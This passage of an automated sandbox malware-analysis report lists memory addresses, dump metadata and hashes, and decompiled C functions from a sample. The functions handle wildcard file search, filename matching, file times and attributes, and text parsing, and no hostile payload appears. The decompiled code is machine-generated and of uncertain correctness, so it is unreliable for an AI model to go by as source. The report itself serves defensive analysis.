                0x003eceb7
                0x003eceb8
                0x003eceb8
                0x003ecee7
                0x003ecef1
                0x003ecef7
                0x003ecefe
                0x00000000
                0x00000000
                0x003ecf04
                0x003ecf04
                0x003ecf0a
                0x00000000
                0x00000000
                0x003ecf10
                0x003ecf10
                0x003ecf12
                0x003ecf19
                0x003ecf1f
                0x003ecf21
                0x003ecf22
                0x003ecf27
                0x003ecf28
                0x003ecf29
                0x003ecf2b
                0x003ecf7b
                0x003ecf7b
                0x003ecf82
                0x003ecf90
                0x003ecfa1
                0x003ecfaf
                0x003ecfaf
                0x003ecfbb
                0x003ecfc0
                0x003ecfc2
                0x003ecfd2
                0x003ecfdc
                0x003ecfe1
                0x003ecfe4
                0x003ecfef
                0x003ecff1
                0x003ecff8
                0x003ecffe
                0x003ecffe
                0x00000000
                0x003ecfe4
                0x003ecf2d
                0x003ecf2d
                0x003ecf34
                0x003ecf36
                0x003ecf39
                0x00000000
                0x00000000
                0x003ecf3b
                0x003ecf3b
                0x003ecf3e
                0x003ecf3e
                0x003ecf3e
                0x003ecf42
                0x00000000
                0x00000000
                0x003ecf44
                0x003ecf44
                0x003ecf4c
                0x003ecf4d
                0x003ecf4f
                0x003ecf52
                0x00000000
                0x00000000
                0x003ecf54
                0x00000000
                0x003ecf54
                0x003ecf56
                0x003ecf61
                0x003ecf6c
                0x003ecf71
                0x003ecf71
                0x003ecf73
                0x00000000
                0x00000000
                0x003ed030
                0x003ed030
                0x003ed033
                0x003ed035
                0x003ed03c
                0x003ed03e
                0x003ed044
                0x003ed045
                0x003ed04a
                0x003ed04b
                0x003ed04b
                0x003ed050
                0x003ed053
                0x003ed059
                0x003ed059
                0x003ed05e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ed3cd
                0x003ed3cd
                0x003ed3d0
                0x003ed3d2
                0x003ed3d2
                0x00000000
                0x00000000
                0x003ecd17
                0x003ecd17
                0x003ecd1f
                0x003ecd25
                0x003ecd28
                0x003ecd4c
                0x003ecd2a
                0x003ecd2a
                0x003ecd2d
                0x003ecd40
                0x003ecd2f
                0x003ecd2f
                0x003ecd31
                0x003ecd36
                0x003ecd36
                0x003ecd2d
                0x00000000
                0x00000000
                0x003ece5d
                0x003ece5d
                0x003ece5e
                0x003ece63
                0x003ece63
                0x003ece63
                0x003ece66
                0x003ece6b
                0x003ece71
                0x003ece71
                0x003ece7d
                0x003ece7d
                0x00000000
                0x00000000
                0x003ec7a2
                0x003ec7a2
                0x003ec7a7
                0x003ec7a8
                0x003ec7a9
                0x003ec7ae
                0x003ec7b4
                0x003ec7b7
                0x00000000
                0x003ec7b9
                0x003ec7b9
                0x00000000
                0x003ec7b9
                0x003ec7b7
                0x003ed40a
                0x003ed410
                0x003ed418
                0x003ed418
                0x00000000
                0x003ed304
                0x003ed2f5
                0x00000000
                0x003ed0fd

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr
                • String ID: .lnk$d>
                • API String ID: 2691759472-1677865091
                • Opcode ID: 8566673aa9f9f2dbb927f202ef2c171cc2f4fe770452fc3f2ac80cbf69d17a8d
                • Instruction ID: a38942c6fc06a5a7dd83baa4ed479a408265df91e28638be0fbc250e2e6120a3
                • Opcode Fuzzy Hash: 8566673aa9f9f2dbb927f202ef2c171cc2f4fe770452fc3f2ac80cbf69d17a8d
                • Instruction Fuzzy Hash: 20A141729001799ADF26DBA1DD45EFA73FCEF44304F0886A6B509E7181EF749B848B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E003FB1B8(signed int _a4, signed int _a8, intOrPtr _a12) {
                				intOrPtr _v0;
                				char _v6;
                				char _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v36;
                				intOrPtr* _v64;
                				intOrPtr _v96;
                				intOrPtr* _v100;
                				CHAR* _v104;
                				signed int _v116;
                				char _v290;
                				signed int _v291;
                				struct _WIN32_FIND_DATAA _v336;
                				union _FINDEX_INFO_LEVELS _v340;
                				signed int _v344;
                				signed int _v348;
                				intOrPtr _v440;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t80;
                				signed int _t82;
                				signed int _t87;
                				signed int _t91;
                				signed int _t93;
                				signed int _t95;
                				signed int _t96;
                				signed int _t100;
                				signed int _t103;
                				signed int _t108;
                				signed int _t111;
                				intOrPtr _t113;
                				signed char _t115;
                				union _FINDEX_INFO_LEVELS _t123;
                				signed int _t128;
                				signed int _t131;
                				void* _t136;
                				void* _t138;
                				signed int _t139;
                				signed int _t142;
                				signed int _t144;
                				signed int _t146;
                				signed int* _t147;
                				signed int _t150;
                				void* _t153;
                				CHAR* _t154;
                				void* _t155;
                				char _t157;
                				char _t159;
                				intOrPtr* _t162;
                				void* _t163;
                				intOrPtr* _t164;
                				signed int _t166;
                				void* _t168;
                				intOrPtr* _t169;
                				signed int _t173;
                				signed int _t177;
                				signed int _t178;
                				intOrPtr* _t183;
                				void* _t192;
                				signed int _t194;
                				signed int _t195;
                				signed int _t197;
                				signed int _t198;
                				signed int _t200;
                				union _FINDEX_INFO_LEVELS _t201;
                				void* _t202;
                				signed int _t206;
                				signed int _t208;
                				signed int _t209;
                				void* _t211;
                				intOrPtr _t212;
                				void* _t213;
                				void* _t214;
                				signed int _t217;
                				void* _t219;
                				signed int _t220;
                				void* _t221;
                				void* _t222;
                				void* _t223;
                				signed int _t224;
                				void* _t225;
                				void* _t226;
                
                				_t80 = _a8;
                				_t222 = _t221 - 0x20;
                				if(_t80 != 0) {
                					_t206 = _a4;
                					_t159 = 0;
                					 *_t80 = 0;
                					_t197 = 0;
                					_t150 = 0;
                					_v36 = 0;
                					_v336.cAlternateFileName = 0;
                					_v28 = 0;
                					__eflags =  *_t206;
                					if( *_t206 == 0) {
                						L9:
                						_v12 = _v12 & 0x00000000;
                						_t82 = _t150 - _t197;
                						_v8 = _t159;
                						_t190 = (_t82 >> 2) + 1;
                						__eflags = _t150 - _t197;
                						_v16 = (_t82 >> 2) + 1;
                						asm("sbb esi, esi");
                						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
                						__eflags = _t208;
                						if(_t208 != 0) {
                							_t195 = _t197;
                							_t157 = _t159;
                							do {
                								_t183 =  *_t195;
                								_t17 = _t183 + 1; // 0x1
                								_v8 = _t17;
                								do {
                									_t142 =  *_t183;
                									_t183 = _t183 + 1;
                									__eflags = _t142;
                								} while (_t142 != 0);
                								_t157 = _t157 + 1 + _t183 - _v8;
                								_t195 = _t195 + 4;
                								_t144 = _v12 + 1;
                								_v12 = _t144;
                								__eflags = _t144 - _t208;
                							} while (_t144 != _t208);
                							_t190 = _v16;
                							_v8 = _t157;
                							_t150 = _v336.cAlternateFileName;
                						}
                						_t209 = E003F8207(_t190, _v8, 1);
                						_t223 = _t222 + 0xc;
                						__eflags = _t209;
                						if(_t209 != 0) {
                							_t87 = _t209 + _v16 * 4;
                							_v20 = _t87;
                							_t191 = _t87;
                							_v16 = _t87;
                							__eflags = _t197 - _t150;
                							if(_t197 == _t150) {
                								L23:
                								_t198 = 0;
                								__eflags = 0;
                								 *_a8 = _t209;
                								goto L24;
                							} else {
                								_t93 = _t209 - _t197;
                								__eflags = _t93;
                								_v24 = _t93;
                								do {
                									_t162 =  *_t197;
                									_v12 = _t162 + 1;
                									do {
                										_t95 =  *_t162;
                										_t162 = _t162 + 1;
                										__eflags = _t95;
                									} while (_t95 != 0);
                									_t163 = _t162 - _v12;
                									_t35 = _t163 + 1; // 0x1
                									_t96 = _t35;
                									_push(_t96);
                									_v12 = _t96;
                									_t100 = E003FF101(_t163, _t191, _v20 - _t191 + _v8,  *_t197);
                									_t223 = _t223 + 0x10;
                									__eflags = _t100;
                									if(_t100 != 0) {
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										E003F9097();
                										asm("int3");
                										_t219 = _t223;
                										_push(_t163);
                										_t164 = _v64;
                										_t47 = _t164 + 1; // 0x1
                										_t192 = _t47;
                										do {
                											_t103 =  *_t164;
                											_t164 = _t164 + 1;
                											__eflags = _t103;
                										} while (_t103 != 0);
                										_push(_t197);
                										_t200 = _a8;
                										_t166 = _t164 - _t192 + 1;
                										_v12 = _t166;
                										__eflags = _t166 - (_t103 | 0xffffffff) - _t200;
                										if(_t166 <= (_t103 | 0xffffffff) - _t200) {
                											_push(_t150);
                											_t50 = _t200 + 1; // 0x1
                											_t153 = _t50 + _t166;
                											_t211 = E003FB136(_t166, _t153, 1);
                											_t168 = _t209;
                											__eflags = _t200;
                											if(_t200 == 0) {
                												L34:
                												_push(_v12);
                												_t153 = _t153 - _t200;
                												_t108 = E003FF101(_t168, _t211 + _t200, _t153, _v0);
                												_t224 = _t223 + 0x10;
                												__eflags = _t108;
                												if(__eflags != 0) {
                													goto L37;
                												} else {
                													_t136 = E003FB587(_a12, _t192, __eflags, _t211);
                													E003F8DCC(0);
                													_t138 = _t136;
                													goto L36;
                												}
                											} else {
                												_push(_t200);
                												_t139 = E003FF101(_t168, _t211, _t153, _a4);
                												_t224 = _t223 + 0x10;
                												__eflags = _t139;
                												if(_t139 != 0) {
                													L37:
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													E003F9097();
                													asm("int3");
                													_push(_t219);
                													_t220 = _t224;
                													_t225 = _t224 - 0x150;
                													_t111 =  *0x40e7ac; // 0xc24f6281
                													_v116 = _t111 ^ _t220;
                													_t169 = _v100;
                													_push(_t153);
                													_t154 = _v104;
                													_push(_t211);
                													_t212 = _v96;
                													_push(_t200);
                													_v440 = _t212;
                													while(1) {
                														__eflags = _t169 - _t154;
                														if(_t169 == _t154) {
                															break;
                														}
                														_t113 =  *_t169;
                														__eflags = _t113 - 0x2f;
                														if(_t113 != 0x2f) {
                															__eflags = _t113 - 0x5c;
                															if(_t113 != 0x5c) {
                																__eflags = _t113 - 0x3a;
                																if(_t113 != 0x3a) {
                																	_t169 = E003FF150(_t154, _t169);
                																	continue;
                																}
                															}
                														}
                														break;
                													}
                													_t193 =  *_t169;
                													__eflags = _t193 - 0x3a;
                													if(_t193 != 0x3a) {
                														L47:
                														_t201 = 0;
                														__eflags = _t193 - 0x2f;
                														if(_t193 == 0x2f) {
                															L51:
                															_t115 = 1;
                															__eflags = 1;
                														} else {
                															__eflags = _t193 - 0x5c;
                															if(_t193 == 0x5c) {
                																goto L51;
                															} else {
                																__eflags = _t193 - 0x3a;
                																if(_t193 == 0x3a) {
                																	goto L51;
                																} else {
                																	_t115 = 0;
                																}
                															}
                														}
                														asm("sbb eax, eax");
                														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
                														E003EFFF0(_t201,  &_v336, _t201, 0x140);
                														_t226 = _t225 + 0xc;
                														_t213 = FindFirstFileExA(_t154, _t201,  &_v336, _t201, _t201, _t201);
                														_t123 = _v340;
                														__eflags = _t213 - 0xffffffff;
                														if(_t213 != 0xffffffff) {
                															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                															__eflags = _t173;
                															_v348 = _t173 >> 2;
                															do {
                																__eflags = _v336.cFileName - 0x2e;
                																if(_v336.cFileName != 0x2e) {
                																	L64:
                																	_push(_t123);
                																	_push(_v344);
                																	_t123 =  &(_v336.cFileName);
                																	_push(_t154);
                																	_push(_t123);
                																	L28();
                																	_t226 = _t226 + 0x10;
                																	__eflags = _t123;
                																	if(_t123 != 0) {
                																		goto L54;
                																	} else {
                																		goto L65;
                																	}
                																} else {
                																	_t177 = _v291;
                																	__eflags = _t177;
                																	if(_t177 == 0) {
                																		goto L65;
                																	} else {
                																		__eflags = _t177 - 0x2e;
                																		if(_t177 != 0x2e) {
                																			goto L64;
                																		} else {
                																			__eflags = _v290;
                																			if(_v290 == 0) {
                																				goto L65;
                																			} else {
                																				goto L64;
                																			}
                																		}
                																	}
                																}
                																goto L58;
                																L65:
                																_t128 = FindNextFileA(_t213,  &_v336);
                																__eflags = _t128;
                																_t123 = _v340;
                															} while (_t128 != 0);
                															_t193 =  *_t123;
                															_t178 = _v348;
                															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                															__eflags = _t178 - _t131;
                															if(_t178 != _t131) {
                																E003F6310(_t154, _t193 + _t178 * 4, _t131 - _t178, 4, E003FB1A0);
                															}
                														} else {
                															_push(_t123);
                															_push(_t201);
                															_push(_t201);
                															_push(_t154);
                															L28();
                															L54:
                															_t201 = _t123;
                														}
                														__eflags = _t213 - 0xffffffff;
                														if(_t213 != 0xffffffff) {
                															FindClose(_t213);
                														}
                														_t124 = _t201;
                													} else {
                														_t124 =  &(_t154[1]);
                														__eflags = _t169 -  &(_t154[1]);
                														if(_t169 ==  &(_t154[1])) {
                															goto L47;
                														} else {
                															_push(_t212);
                															_push(0);
                															_push(0);
                															_push(_t154);
                															L28();
                														}
                													}
                													L58:
                													_pop(_t202);
                													_pop(_t214);
                													__eflags = _v16 ^ _t220;
                													_pop(_t155);
                													return E003EFBBC(_t124, _t155, _v16 ^ _t220, _t193, _t202, _t214);
                												} else {
                													goto L34;
                												}
                											}
                										} else {
                											_t138 = 0xc;
                											L36:
                											return _t138;
                										}
                									} else {
                										goto L22;
                									}
                									goto L68;
                									L22:
                									_t194 = _v16;
                									 *((intOrPtr*)(_v24 + _t197)) = _t194;
                									_t197 = _t197 + 4;
                									_t191 = _t194 + _v12;
                									_v16 = _t194 + _v12;
                									__eflags = _t197 - _t150;
                								} while (_t197 != _t150);
                								goto L23;
                							}
                						} else {
                							_t198 = _t197 | 0xffffffff;
                							L24:
                							E003F8DCC(0);
                							goto L25;
                						}
                					} else {
                						while(1) {
                							_v8 = 0x3f2a;
                							_v6 = _t159;
                							_t146 = E003FF110( *_t206,  &_v8);
                							__eflags = _t146;
                							if(_t146 != 0) {
                								_push( &_v36);
                								_push(_t146);
                								_push( *_t206);
                								L38();
                								_t222 = _t222 + 0xc;
                							} else {
                								_t146 =  &_v36;
                								_push(_t146);
                								_push(0);
                								_push(0);
                								_push( *_t206);
                								L28();
                								_t222 = _t222 + 0x10;
                							}
                							_t198 = _t146;
                							__eflags = _t198;
                							if(_t198 != 0) {
                								break;
                							}
                							_t206 = _t206 + 4;
                							_t159 = 0;
                							__eflags =  *_t206;
                							if( *_t206 != 0) {
                								continue;
                							} else {
                								_t150 = _v336.cAlternateFileName;
                								_t197 = _v36;
                								goto L9;
                							}
                							goto L68;
                						}
                						L25:
                						E003FB562( &_v36);
                						_t91 = _t198;
                						goto L26;
                					}
                				} else {
                					_t147 = E003F91A8();
                					_t217 = 0x16;
                					 *_t147 = _t217;
                					E003F9087();
                					_t91 = _t217;
                					L26:
                					return _t91;
                				}
                				L68:
                			}


                APIs
                • _free.LIBCMT ref: 003FB324
                  • Part of subcall function 003F9097: IsProcessorFeaturePresent.KERNEL32(00000017,003F9086,00000000,003F8D94,00000000,00000000,00000000,00000016,?,?,003F9093,00000000,00000000,00000000,00000000,00000000), ref: 003F9099
                  • Part of subcall function 003F9097: GetCurrentProcess.KERNEL32(C0000417,003F8D94,00000000,?,00000003,003F9868), ref: 003F90BB
                  • Part of subcall function 003F9097: TerminateProcess.KERNEL32(00000000,?,00000003,003F9868), ref: 003F90C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                • String ID: *?$.
                • API String ID: 2667617558-3972193922
                • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                • Instruction ID: 86a4ab77e3cd0b511c81d10d60dd2bf25a6af154b8ffeb2fd568e790305f5739
                • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                • Instruction Fuzzy Hash: D7517FB5E0010EAFDF16DFA8C881ABDF7B5EF58310F25416AEA54E7341E7359A018B50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E003D75DE(void* __ecx) {
                				void* __esi;
                				char _t55;
                				signed int _t58;
                				void* _t62;
                				signed int _t63;
                				signed int _t69;
                				signed int _t86;
                				void* _t91;
                				void* _t101;
                				intOrPtr* _t106;
                				void* _t108;
                
                				E003EEB78(0x4027e9, _t108);
                				E003EEC50(0x60f8);
                				_t106 =  *((intOrPtr*)(_t108 + 0xc));
                				if( *_t106 == 0) {
                					L3:
                					_t101 = 0x802;
                					E003E0602(_t108 - 0x1014, _t106, 0x802);
                					L4:
                					_t82 =  *((intOrPtr*)(_t108 + 8));
                					E003D77DF(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4094, 0x800);
                					_t113 =  *((short*)(_t108 - 0x4094)) - 0x3a;
                					if( *((short*)(_t108 - 0x4094)) == 0x3a) {
                						__eflags =  *((char*)(_t108 + 0x10));
                						if(__eflags == 0) {
                							E003E05DA(__eflags, _t108 - 0x1014, _t108 - 0x4094, _t101);
                							E003D6EDB(_t108 - 0x3094);
                							_push(0);
                							_t55 = E003DA56D(_t108 - 0x3094, __eflags, _t106, _t108 - 0x3094);
                							_t86 =  *(_t108 - 0x208c);
                							 *((char*)(_t108 - 0xd)) = _t55;
                							__eflags = _t86 & 0x00000001;
                							if((_t86 & 0x00000001) != 0) {
                								__eflags = _t86 & 0xfffffffe;
                								E003DA4ED(_t106, _t86 & 0xfffffffe);
                							}
                							E003D9556(_t108 - 0x204c);
                							 *((intOrPtr*)(_t108 - 4)) = 1;
                							_t58 = E003D9F1A(_t108 - 0x204c, __eflags, _t108 - 0x1014, 0x11);
                							__eflags = _t58;
                							if(_t58 != 0) {
                								_push(0);
                								_push(_t108 - 0x204c);
                								_push(0);
                								_t69 = E003D3BBA(_t82);
                								__eflags = _t69;
                								if(_t69 != 0) {
                									E003D9620(_t108 - 0x204c);
                								}
                							}
                							E003D9556(_t108 - 0x50cc);
                							__eflags =  *((char*)(_t108 - 0xd));
                							 *((char*)(_t108 - 4)) = 2;
                							if( *((char*)(_t108 - 0xd)) != 0) {
                								_t63 = E003D98E0(_t108 - 0x50cc, _t106, _t106, 5);
                								__eflags = _t63;
                								if(_t63 != 0) {
                									SetFileTime( *(_t108 - 0x50c4), _t108 - 0x206c, _t108 - 0x2064, _t108 - 0x205c);
                								}
                							}
                							E003DA4ED(_t106,  *(_t108 - 0x208c));
                							E003D959A(_t108 - 0x50cc);
                							_t91 = _t108 - 0x204c;
                						} else {
                							E003D9556(_t108 - 0x6104);
                							_push(1);
                							_push(_t108 - 0x6104);
                							_push(0);
                							 *((intOrPtr*)(_t108 - 4)) = 0;
                							E003D3BBA(_t82);
                							_t91 = _t108 - 0x6104;
                						}
                						_t62 = E003D959A(_t91);
                					} else {
                						E003D2021(_t113, 0x53, _t82 + 0x32, _t106);
                						_t62 = E003D6D83(0x411098, 3);
                					}
                					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
                					return _t62;
                				}
                				_t112 =  *((intOrPtr*)(_t106 + 2));
                				if( *((intOrPtr*)(_t106 + 2)) != 0) {
                					goto L3;
                				} else {
                					_t101 = 0x802;
                					E003E0602(_t108 - 0x1014, 0x4037a0, 0x802);
                					E003E05DA(_t112, _t108 - 0x1014, _t106, 0x802);
                					goto L4;
                				}
                			}


                APIs
                • __EH_prolog.LIBCMT ref: 003D75E3
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                  • Part of subcall function 003DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003DA598
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D777F
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA501
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA532
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                • String ID: :
                • API String ID: 3226429890-336475711
                • Opcode ID: fa792feaafb8b533fbba5f53d559d8af54c6ab5340266577c039ddac30e2572e
                • Instruction ID: 9ad1478d7cd13fd6dbd323bf2d83c7c73ac4b1b6f06327c319ddab45d435dd1e
                • Opcode Fuzzy Hash: fa792feaafb8b533fbba5f53d559d8af54c6ab5340266577c039ddac30e2572e
                • Instruction Fuzzy Hash: FB418672800158A9EB26EB64ED55EEEB37DEF45300F0040A7B605A7292EB745F84CF61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E003DB37A() {
                				void* __ecx;
                				signed int _t23;
                				signed int _t25;
                				void* _t27;
                				void* _t31;
                				signed int _t35;
                				void* _t39;
                				void* _t40;
                				signed int _t41;
                				intOrPtr _t42;
                				void* _t46;
                				signed int _t49;
                				void* _t50;
                				signed int _t51;
                				void* _t52;
                				signed short* _t53;
                				signed short* _t55;
                				signed short* _t56;
                				void* _t57;
                
                				_t56 =  *(_t57 + 0x14);
                				_t55 =  *(_t57 + 0x1c);
                				 *(_t57 + 0x18) = 0x2a;
                				_t39 = 0x2e;
                				while(1) {
                					 *(_t57 + 0x18) = _t56;
                					_t51 = E003DB4EC( *_t55 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x24))) & 0x0000ffff;
                					_t41 = E003DB4EC( *_t56 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x24))) & 0x0000ffff;
                					_t56 =  &(_t56[1]);
                					_t49 = _t41;
                					_t23 = _t41;
                					if(_t49 == 0) {
                						break;
                					}
                					if(_t49 ==  *(_t57 + 0x14)) {
                						_t25 =  *_t56 & 0x0000ffff;
                						if(_t25 == 0) {
                							L28:
                							return 1;
                						}
                						_t50 = 0x2e;
                						_t40 = 0;
                						if(_t25 != _t50) {
                							L26:
                							while( *_t55 != _t40) {
                								_push( *((intOrPtr*)(_t57 + 0x24)));
                								_push(_t55);
                								_push(_t56);
                								_t27 = E003DB37A();
                								_t55 =  &(_t55[1]);
                								if(_t27 != 0) {
                									goto L28;
                								}
                							}
                							L27:
                							return 0;
                						}
                						_t42 =  *((intOrPtr*)(_t57 + 0x10));
                						_t52 = 0x2a;
                						if( *((intOrPtr*)(_t42 + 4)) != _t52 ||  *((intOrPtr*)(_t42 + 6)) != 0) {
                							_push(_t50);
                							_push(_t55);
                							_t53 = E003F22C6(_t42);
                							if(( *(_t57 + 0x18))[2] != _t40) {
                								if(_t53 == 0) {
                									goto L26;
                								}
                								_t55 = _t53;
                								_t31 = E003F6105(_t56, L"*?");
                								_pop(_t46);
                								if(_t31 != 0) {
                									goto L26;
                								}
                								_t54 =  &(_t53[1]);
                								_push(0x2e);
                								_push( &(_t53[1]));
                								if(E003F22C6(_t46) != 0) {
                									goto L26;
                								}
                								_t35 = E003DB4CB( &(( *(_t57 + 0x14))[2]), _t54,  *((intOrPtr*)(_t57 + 0x24)));
                								asm("sbb al, al");
                								return  ~_t35 + 1;
                							}
                							if(_t53 == 0 || _t53[1] == _t40) {
                								_t40 = 1;
                							}
                							return _t40;
                						} else {
                							goto L28;
                						}
                					}
                					if(_t41 == 0x3f) {
                						if(_t51 == 0) {
                							goto L27;
                						}
                						L11:
                						_t55 =  &(_t55[1]);
                						continue;
                					}
                					if(_t23 == _t51) {
                						goto L11;
                					}
                					if(_t23 != _t39) {
                						goto L27;
                					}
                					if(_t51 == 0 || _t51 == 0x5c || _t51 == _t39) {
                						continue;
                					} else {
                						goto L27;
                					}
                				}
                				return _t23 & 0xffffff00 | _t51 == 0x00000000;
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr
                • String ID: *
                • API String ID: 2691759472-163128923
                • Opcode ID: 9cfd16b1ca2f5550508bd0e671bf15df68da023ae634aba25b938e3b82f32d21
                • Instruction ID: 1f1d5f10a6e8d91790f4997356cdb0541c904dc2a739a8ae2a11bb5e6f87a9d5
                • Opcode Fuzzy Hash: 9cfd16b1ca2f5550508bd0e671bf15df68da023ae634aba25b938e3b82f32d21
                • Instruction Fuzzy Hash: DC310727544301DACB27DA16B902A7BE3F8EF90B14B17841FF98457343EB268C41A261
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 26%
                			E003EB48E(void* __ecx, void* __edx, void* __eflags, char _a3, char _a4, char _a7, char _a8, intOrPtr* _a8200) {
                				void* __edi;
                				void* __ebp;
                				intOrPtr _t20;
                				short* _t31;
                				intOrPtr* _t33;
                				signed int _t41;
                				intOrPtr* _t42;
                				void* _t44;
                
                				E003EEC50(0x2004);
                				_push(0x80000);
                				_t42 = E003F3E33(__ecx);
                				if(_t42 == 0) {
                					E003D6CA7(0x411098);
                				}
                				_t33 = _a8200;
                				 *_t42 = 0;
                				_t41 = 0;
                				while(1) {
                					_push(0x1000);
                					_push( &_a3);
                					_push(0);
                					_push(0);
                					_push( &_a4);
                					_push( *_t33);
                					_t20 = E003EB314(_t41, 0);
                					 *_t33 = _t20;
                					if(_t20 == 0) {
                						break;
                					}
                					if( *_t42 != 0 || _a8 != 0x7b) {
                						if(_a8 == 0x7d || E003F3E13( &_a8) + _t41 > 0x3fffb) {
                							break;
                						} else {
                							E003F7686(_t42,  &_a8);
                							_t41 = E003F3E13(_t42);
                							_t44 = _t44 + 0xc;
                							if(_t41 == 0) {
                								L11:
                								if(_a7 == 0) {
                									E003F6066(_t42 + _t41 * 2, L"\r\n");
                								}
                								continue;
                							}
                							_t6 = _t41 - 1; // -1
                							_t31 = _t42 + _t6 * 2;
                							while( *_t31 == 0x20) {
                								_t31 = _t31 - 2;
                								_t41 = _t41 - 1;
                								if(_t41 != 0) {
                									continue;
                								}
                								goto L11;
                							}
                							goto L11;
                						}
                					} else {
                						continue;
                					}
                				}
                				return _t42;
                			}












                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
